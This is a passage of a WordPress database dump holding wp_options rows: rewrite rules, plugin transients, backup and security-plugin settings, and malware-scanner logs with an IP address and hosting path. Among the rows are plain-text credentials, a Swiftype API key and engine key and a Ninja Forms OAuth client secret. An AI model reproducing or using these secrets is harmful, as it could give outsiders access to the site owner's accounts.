index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(511104,'_site_transient_apto-db-ready-0d35025fc8','1','no'),(510450,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1632327873','no'),(510451,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','O:8:\"stdClass\":100:{s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";i:5145;}s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";i:4768;}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";i:2730;}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";i:2603;}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";i:2014;}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";i:1867;}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";i:1854;}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";i:1526;}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";i:1515;}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";i:1507;}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";i:1502;}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";i:1501;}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";i:1474;}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";i:1312;}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";i:1283;}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";i:1280;}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";i:1239;}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";i:1161;}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";i:1130;}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";i:1067;}s:8:\"security\";a:3:{s:4:\"name\";s:8:\"security\";s:4:\"slug\";s:8:\"security\";s:5:\"count\";i:973;}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";i:939;}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";i:916;}s:10:\"e-commerce\";a:3:{s:4:\"name\";s:10:\"e-commerce\";s:4:\"slug\";s:10:\"e-commerce\";s:5:\"count\";i:901;}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";i:887;}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";i:840;}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";i:824;}s:6:\"slider\";a:3:{s:4:\"name\";s:6:\"slider\";s:4:\"slug\";s:6:\"slider\";s:5:\"count\";i:819;}s:9:\"analytics\";a:3:{s:4:\"name\";s:9:\"analytics\";s:4:\"slug\";s:9:\"analytics\";s:5:\"count\";i:815;}s:4:\"form\";a:3:{s:4:\"name\";s:4:\"form\";s:4:\"slug\";s:4:\"form\";s:5:\"count\";i:799;}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";i:762;}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";i:753;}s:6:\"search\";a:3:{s:4:\"name\";s:6:\"search\";s:4:\"slug\";s:6:\"search\";s:5:\"count\";i:734;}s:6:\"editor\";a:3:{s:4:\"name\";s:6:\"editor\";s:4:\"slug\";s:6:\"editor\";s:5:\"count\";i:731;}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";i:730;}s:7:\"payment\";a:3:{s:4:\"name\";s:7:\"payment\";s:4:\"slug\";s:7:\"payment\";s:5:\"count\";i:719;}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";i:717;}s:4:\"menu\";a:3:{s:4:\"name\";s:4:\"menu\";s:4:\"slug\";s:4:\"menu\";s:5:\"count\";i:688;}s:9:\"gutenberg\";a:3:{s:4:\"name\";s:9:\"gutenberg\";s:4:\"slug\";s:9:\"gutenberg\";s:5:\"count\";i:671;}s:12:\"contact-form\";a:3:{s:4:\"name\";s:12:\"contact form\";s:4:\"slug\";s:12:\"contact-form\";s:5:\"count\";i:670;}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";i:668;}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";i:666;}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";i:665;}s:5:\"embed\";a:3:{s:4:\"name\";s:5:\"embed\";s:4:\"slug\";s:5:\"embed\";s:5:\"count\";i:663;}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"ajax\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";i:653;}s:15:\"payment-gateway\";a:3:{s:4:\"name\";s:15:\"payment gateway\";s:4:\"slug\";s:15:\"payment-gateway\";s:5:\"count\";i:647;}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";i:602;}s:3:\"css\";a:3:{s:4:\"name\";s:3:\"css\";s:4:\"slug\";s:3:\"css\";s:5:\"count\";i:600;}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";i:593;}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";i:592;}s:9:\"affiliate\";a:3:{s:4:\"name\";s:9:\"affiliate\";s:4:\"slug\";s:9:\"affiliate\";s:5:\"count\";i:578;}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";i:575;}s:9:\"dashboard\";a:3:{s:4:\"name\";s:9:\"dashboard\";s:4:\"slug\";s:9:\"dashboard\";s:5:\"count\";i:568;}s:10:\"responsive\";a:3:{s:4:\"name\";s:10:\"responsive\";s:4:\"slug\";s:10:\"responsive\";s:5:\"count\";i:567;}s:5:\"theme\";a:3:{s:4:\"name\";s:5:\"theme\";s:4:\"slug\";s:5:\"theme\";s:5:\"count\";i:564;}s:3:\"api\";a:3:{s:4:\"name\";s:3:\"api\";s:4:\"slug\";s:3:\"api\";s:5:\"count\";i:559;}s:7:\"comment\";a:3:{s:4:\"name\";s:7:\"comment\";s:4:\"slug\";s:7:\"comment\";s:5:\"count\";i:556;}s:7:\"contact\";a:3:{s:4:\"name\";s:7:\"contact\";s:4:\"slug\";s:7:\"contact\";s:5:\"count\";i:553;}s:3:\"ads\";a:3:{s:4:\"name\";s:3:\"ads\";s:4:\"slug\";s:3:\"ads\";s:5:\"count\";i:551;}s:9:\"elementor\";a:3:{s:4:\"name\";s:9:\"elementor\";s:4:\"slug\";s:9:\"elementor\";s:5:\"count\";i:546;}s:5:\"block\";a:3:{s:4:\"name\";s:5:\"block\";s:4:\"slug\";s:5:\"block\";s:5:\"count\";i:542;}s:6:\"custom\";a:3:{s:4:\"name\";s:6:\"custom\";s:4:\"slug\";s:6:\"custom\";s:5:\"count\";i:538;}s:10:\"categories\";a:3:{s:4:\"name\";s:10:\"categories\";s:4:\"slug\";s:10:\"categories\";s:5:\"count\";i:534;}s:4:\"user\";a:3:{s:4:\"name\";s:4:\"user\";s:4:\"slug\";s:4:\"user\";s:5:\"count\";i:523;}s:6:\"button\";a:3:{s:4:\"name\";s:6:\"button\";s:4:\"slug\";s:6:\"button\";s:5:\"count\";i:514;}s:6:\"events\";a:3:{s:4:\"name\";s:6:\"events\";s:4:\"slug\";s:6:\"events\";s:5:\"count\";i:511;}s:9:\"marketing\";a:3:{s:4:\"name\";s:9:\"marketing\";s:4:\"slug\";s:9:\"marketing\";s:5:\"count\";i:501;}s:4:\"tags\";a:3:{s:4:\"name\";s:4:\"tags\";s:4:\"slug\";s:4:\"tags\";s:5:\"count\";i:500;}s:6:\"mobile\";a:3:{s:4:\"name\";s:6:\"mobile\";s:4:\"slug\";s:6:\"mobile\";s:5:\"count\";i:499;}s:4:\"chat\";a:3:{s:4:\"name\";s:4:\"chat\";s:4:\"slug\";s:4:\"chat\";s:5:\"count\";i:486;}s:5:\"users\";a:3:{s:4:\"name\";s:5:\"users\";s:4:\"slug\";s:5:\"users\";s:5:\"count\";i:486;}s:5:\"popup\";a:3:{s:4:\"name\";s:5:\"popup\";s:4:\"slug\";s:5:\"popup\";s:5:\"count\";i:474;}s:8:\"shipping\";a:3:{s:4:\"name\";s:8:\"shipping\";s:4:\"slug\";s:8:\"shipping\";s:5:\"count\";i:470;}s:14:\"contact-form-7\";a:3:{s:4:\"name\";s:14:\"contact form 7\";s:4:\"slug\";s:14:\"contact-form-7\";s:5:\"count\";i:469;}s:8:\"calendar\";a:3:{s:4:\"name\";s:8:\"calendar\";s:4:\"slug\";s:8:\"calendar\";s:5:\"count\";i:469;}s:5:\"forms\";a:3:{s:4:\"name\";s:5:\"forms\";s:4:\"slug\";s:5:\"forms\";s:5:\"count\";i:465;}s:10:\"newsletter\";a:3:{s:4:\"name\";s:10:\"newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:5:\"count\";i:454;}s:10:\"navigation\";a:3:{s:4:\"name\";s:10:\"navigation\";s:4:\"slug\";s:10:\"navigation\";s:5:\"count\";i:449;}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";i:446;}s:9:\"slideshow\";a:3:{s:4:\"name\";s:9:\"slideshow\";s:4:\"slug\";s:9:\"slideshow\";s:5:\"count\";i:444;}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";i:434;}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";i:427;}s:10:\"statistics\";a:3:{s:4:\"name\";s:10:\"statistics\";s:4:\"slug\";s:10:\"statistics\";s:5:\"count\";i:423;}s:11:\"performance\";a:3:{s:4:\"name\";s:11:\"performance\";s:4:\"slug\";s:11:\"performance\";s:5:\"count\";i:419;}s:8:\"redirect\";a:3:{s:4:\"name\";s:8:\"redirect\";s:4:\"slug\";s:8:\"redirect\";s:5:\"count\";i:412;}s:12:\"social-media\";a:3:{s:4:\"name\";s:12:\"social media\";s:4:\"slug\";s:12:\"social-media\";s:5:\"count\";i:411;}s:4:\"news\";a:3:{s:4:\"name\";s:4:\"news\";s:4:\"slug\";s:4:\"news\";s:5:\"count\";i:406;}s:10:\"shortcodes\";a:3:{s:4:\"name\";s:10:\"shortcodes\";s:4:\"slug\";s:10:\"shortcodes\";s:5:\"count\";i:402;}s:12:\"notification\";a:3:{s:4:\"name\";s:12:\"notification\";s:4:\"slug\";s:12:\"notification\";s:5:\"count\";i:399;}s:4:\"code\";a:3:{s:4:\"name\";s:4:\"code\";s:4:\"slug\";s:4:\"code\";s:5:\"count\";i:391;}s:7:\"plugins\";a:3:{s:4:\"name\";s:7:\"plugins\";s:4:\"slug\";s:7:\"plugins\";s:5:\"count\";i:390;}s:8:\"tracking\";a:3:{s:4:\"name\";s:8:\"tracking\";s:4:\"slug\";s:8:\"tracking\";s:5:\"count\";i:384;}s:9:\"multisite\";a:3:{s:4:\"name\";s:9:\"multisite\";s:4:\"slug\";s:9:\"multisite\";s:5:\"count\";i:384;}s:3:\"url\";a:3:{s:4:\"name\";s:3:\"url\";s:4:\"slug\";s:3:\"url\";s:5:\"count\";i:380;}s:6:\"import\";a:3:{s:4:\"name\";s:6:\"import\";s:4:\"slug\";s:6:\"import\";s:5:\"count\";i:380;}s:4:\"meta\";a:3:{s:4:\"name\";s:4:\"meta\";s:4:\"slug\";s:4:\"meta\";s:5:\"count\";i:373;}s:4:\"list\";a:3:{s:4:\"name\";s:4:\"list\";s:4:\"slug\";s:4:\"list\";s:5:\"count\";i:372;}s:6:\"blocks\";a:3:{s:4:\"name\";s:6:\"blocks\";s:4:\"slug\";s:6:\"blocks\";s:5:\"count\";i:370;}s:16:\"google-analytics\";a:3:{s:4:\"name\";s:16:\"google analytics\";s:4:\"slug\";s:16:\"google-analytics\";s:5:\"count\";i:361;}s:5:\"cache\";a:3:{s:4:\"name\";s:5:\"cache\";s:4:\"slug\";s:5:\"cache\";s:5:\"count\";i:358;}}','no'),(511056,'_transient_timeout_wpseo_total_unindexed_posts_limited','1632333419','no'),(511057,'_transient_wpseo_total_unindexed_posts_limited','26','no'),(71569,'GOTMLS_scan_log/69.143.35.179/1515452591.7697','a:2:{s:8:\"settings\";a:11:{s:12:\"msg_position\";a:4:{i:0;s:4:\"80px\";i:1;s:4:\"40px\";i:2;s:5:\"400px\";i:3;s:5:\"600px\";}s:9:\"scan_what\";i:2;s:10:\"scan_depth\";i:-1;s:11:\"exclude_ext\";a:28:{i:0;s:3:\"png\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"gif\";i:4;s:3:\"bmp\";i:5;s:3:\"tif\";i:6;s:4:\"tiff\";i:7;s:3:\"psd\";i:8;s:3:\"svg\";i:9;s:3:\"ico\";i:10;s:3:\"doc\";i:11;s:4:\"docx\";i:12;s:3:\"ttf\";i:13;s:3:\"fla\";i:14;s:3:\"flv\";i:15;s:3:\"mov\";i:16;s:3:\"mp3\";i:17;s:3:\"pdf\";i:18;s:3:\"css\";i:19;s:3:\"pot\";i:20;s:2:\"po\";i:21;s:2:\"mo\";i:22;s:2:\"so\";i:23;s:3:\"exe\";i:24;s:3:\"zip\";i:25;s:2:\"7z\";i:26;s:2:\"gz\";i:27;s:3:\"rar\";}s:12:\"check_custom\";s:0:\"\";s:11:\"exclude_dir\";a:0:{}s:8:\"user_can\";s:16:\"activate_plugins\";s:10:\"scan_level\";i:3;s:5:\"check\";a:4:{i:0;s:8:\"htaccess\";i:1;s:8:\"timthumb\";i:2;s:8:\"backdoor\";i:3;s:5:\"known\";}s:10:\"dont_check\";a:0:{}s:15:\"skip_quarantine\";i:0;}s:4:\"scan\";a:6:{s:3:\"dir\";s:27:\"/home4/zphiblgz/public_html\";s:5:\"start\";i:1515452593;s:4:\"type\";s:13:\"Complete Scan\";s:9:\"microtime\";d:83;s:7:\"percent\";i:-1;s:6:\"finish\";i:1515452676;}}','yes'),(71577,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(73976,'swiftype_api_key','Ep-TzwiTMQbiLCz76T4h','yes'),(73977,'swiftype_api_authorized','1','yes'),(73979,'swiftype_engine_name','Wordpress','yes'),(73980,'swiftype_engine_slug','wordpress','yes'),(73981,'swiftype_engine_key','X2XSz1KcyxoSWssYzAKj','yes'),(73982,'swiftype_num_indexed_documents','73','yes'),(73983,'swiftype_engine_initialized','1','yes'),(85755,'widget_hustle_module_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(76086,'icwp_wpsf_sessions_options','a:1:{s:15:\"enable_sessions\";s:1:\"Y\";}','yes'),(85756,'widget_inc_opt_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(85777,'GOTMLS_scan_log/69.143.35.179/1520945603.0204','a:2:{s:8:\"settings\";a:11:{s:12:\"msg_position\";a:4:{i:0;s:4:\"80px\";i:1;s:4:\"40px\";i:2;s:5:\"400px\";i:3;s:5:\"600px\";}s:9:\"scan_what\";i:2;s:10:\"scan_depth\";i:-1;s:11:\"exclude_ext\";a:28:{i:0;s:3:\"png\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"gif\";i:4;s:3:\"bmp\";i:5;s:3:\"tif\";i:6;s:4:\"tiff\";i:7;s:3:\"psd\";i:8;s:3:\"svg\";i:9;s:3:\"ico\";i:10;s:3:\"doc\";i:11;s:4:\"docx\";i:12;s:3:\"ttf\";i:13;s:3:\"fla\";i:14;s:3:\"flv\";i:15;s:3:\"mov\";i:16;s:3:\"mp3\";i:17;s:3:\"pdf\";i:18;s:3:\"css\";i:19;s:3:\"pot\";i:20;s:2:\"po\";i:21;s:2:\"mo\";i:22;s:2:\"so\";i:23;s:3:\"exe\";i:24;s:3:\"zip\";i:25;s:2:\"7z\";i:26;s:2:\"gz\";i:27;s:3:\"rar\";}s:12:\"check_custom\";s:0:\"\";s:11:\"exclude_dir\";a:0:{}s:8:\"user_can\";s:16:\"activate_plugins\";s:10:\"scan_level\";i:3;s:5:\"check\";a:4:{i:0;s:8:\"htaccess\";i:1;s:8:\"timthumb\";i:2;s:8:\"backdoor\";i:3;s:5:\"known\";}s:10:\"dont_check\";a:0:{}s:15:\"skip_quarantine\";i:0;}s:4:\"scan\";a:7:{s:3:\"dir\";s:27:\"/home4/zphiblgz/public_html\";s:5:\"start\";i:1520945607;s:4:\"type\";s:13:\"Complete Scan\";s:9:\"microtime\";d:253;s:7:\"percent\";i:-1;s:6:\"finish\";i:1520945860;s:11:\"last_threat\";d:1520945860.9473679;}}','yes'),(85751,'hustle_database_version','4.0','no'),(85752,'wdev-frash','a:3:{s:7:\"plugins\";a:2:{s:45:\"wordpress-popup/lib/free-dashboard/module.php\";i:1520944165;s:50:\"wordpress-popup/inc/class-hustle-notifications.php\";i:1601255296;}s:5:\"queue\";a:2:{s:32:\"e8a05f067e20f5e764165feed3d9e765\";a:3:{s:6:\"plugin\";s:50:\"wordpress-popup/inc/class-hustle-notifications.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1601255296;}s:32:\"cadb80b8069fa163eac11e39f46e65d1\";a:3:{s:6:\"plugin\";s:50:\"wordpress-popup/inc/class-hustle-notifications.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1601860096;}}s:4:\"done\";a:2:{i:0;a:6:{s:6:\"plugin\";s:45:\"wordpress-popup/lib/free-dashboard/module.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1520944165;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"27ae6ed2eda0f5c6e6d0139644558649\";s:10:\"handled_at\";i:1521691362;}i:1;a:6:{s:6:\"plugin\";s:45:\"wordpress-popup/lib/free-dashboard/module.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1521777751;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"27ae6ed2eda0f5c6e6d0139644558649\";s:10:\"handled_at\";i:1526755789;}}}','no'),(85754,'hustle_color_index','0','yes'),(85757,'hustle_popup_migrated','1','yes'),(87759,'updraftplus_dismissedautobackup','1618905640','yes'),(334253,'shield_mod_config_7267cb0b0387e324b58552b5f3045375','a:5:{s:4:\"slug\";s:5:\"email\";s:10:\"properties\";a:10:{s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:5:\"email\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;}s:8:\"sections\";a:2:{i:0;a:3:{s:4:\"slug\";s:21:\"section_email_options\";s:5:\"title\";s:13:\"Email Options\";s:7:\"primary\";b:1;}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:25:\"send_email_throttle_limit\";s:7:\"section\";s:21:\"section_email_options\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Email Throttle Limit\";s:7:\"summary\";s:23:\"Limit Emails Per Second\";s:11:\"description\";s:183:\"You throttle emails sent by this plugin by limiting the number of emails sent every second. This is useful in case you get hit by a bot attack. Zero (0) turns this off. Suggested: 10.\";}}s:10:\"meta_modts\";i:1582303038;}','yes'),(98784,'nf_tel_collate','1','no'),(99207,'icwp_wpsf_insights_options','a:2:{s:18:\"help_video_options\";a:0:{}s:13:\"xfer_excluded\";b:0;}','yes'),(102817,'ninja_forms_oauth_client_secret','m1il8nvOq5tXsdVgRrzqZZu3ajOrnGwJHO4PbADB','yes'),(102818,'ninja_forms_db_version','1.1','no'),(334252,'shield_mod_config_be038291d7f4a846bd2417f067ee3cef','a:6:{s:4:\"slug\";s:7:\"license\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"license\";s:4:\"name\";s:12:\"Pro Security\";s:10:\"menu_title\";s:7:\"Go Pro!\";s:21:\"show_module_menu_item\";b:1;s:19:\"highlight_menu_item\";b:1;s:7:\"tagline\";s:44:\"The Best In WordPress Security, Only Better.\";s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:7:\"license\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:12:{i:0;a:6:{s:3:\"key\";s:11:\"license_key\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:1;a:5:{s:3:\"key\";s:20:\"license_activated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:2;a:5:{s:3:\"key\";s:22:\"license_deactivated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:3;a:5:{s:3:\"key\";s:23:\"license_last_checked_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:4;a:5:{s:3:\"key\";s:26:\"license_deactivated_reason\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:5;a:5:{s:3:\"key\";s:26:\"last_warning_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:6;a:5:{s:3:\"key\";s:30:\"last_deactivated_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:7;a:5:{s:3:\"key\";s:11:\"last_errors\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";s:0:\"\";}i:8;a:6:{s:3:\"key\";s:13:\"last_error_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:9;a:6:{s:3:\"key\";s:20:\"keyless_request_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:10;a:6:{s:3:\"key\";s:18:\"keyless_request_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:11;a:6:{s:3:\"key\";s:12:\"license_data\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:13:{s:17:\"license_store_url\";s:35:\"https://onedollarplugin.com/edd-sl/\";s:10:\"keyless_cp\";s:19:\"https://shsec.io/c5\";s:17:\"license_item_name\";s:19:\"Shield Security Pro\";s:15:\"license_item_id\";s:4:\"6047\";s:20:\"license_item_name_sc\";s:40:\"Shield Security Pro (via Shield Central)\";s:18:\"license_item_id_sc\";s:3:\"968\";s:22:\"lic_verify_expire_days\";i:7;s:28:\"lic_verify_expire_grace_days\";i:3;s:18:\"license_key_length\";i:32;s:16:\"license_key_type\";s:12:\"alphanumeric\";s:7:\"keyless\";b:1;s:24:\"keyless_handshake_expire\";i:90;s:6:\"events\";a:3:{s:17:\"lic_check_success\";a:1:{s:4:\"stat\";b:0;}s:14:\"lic_fail_email\";a:1:{s:4:\"stat\";b:0;}s:19:\"lic_fail_deactivate\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(162998,'icwp_wpsf_install_date','1508738118','yes'),(102879,'redirect_page','657','yes'),(130546,'_transient_wc_count_comments','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:0;s:3:\"all\";i:0;s:9:\"moderated\";i:0;s:8:\"approved\";i:0;s:4:\"spam\";i:0;s:5:\"trash\";i:0;s:12:\"post-trashed\";i:0;}','yes'),(130726,'nf_form_tel_data','2,1','no'),(130732,'ninja_forms_data_is_clean','true','yes'),(130589,'updraft_onedrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-6c4781fa217083f78e29e0935c9decf8\";a:0:{}}}','yes'),(130590,'updraft_azure','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-d453a257f1aedde01bb0e5562c425a35\";a:0:{}}}','yes'),(130591,'updraft_sftp','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-53878e3eda4f9f295511572d2cc68b89\";a:0:{}}}','yes'),(130592,'updraft_googlecloud','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-befeacd1267610d7cb32292b67ad5070\";a:0:{}}}','yes'),(130593,'updraft_backblaze','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-2cda83d12db14638754bdfec7d713c6e\";a:0:{}}}','yes'),(130594,'updraft_webdav','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-109e086a183515ac412701c124f8a203\";a:0:{}}}','yes'),(131740,'Admin_custome_login_Version','s:30:\"a:1:{s:7:\"Version\";s:3:\"1.0\";}\";','yes'),(131741,'Admin_custome_login_dashboard','s:44:\"a:1:{s:16:\"dashboard_status\";s:7:\"disable\";}\";','yes'),(131742,'Admin_custome_lo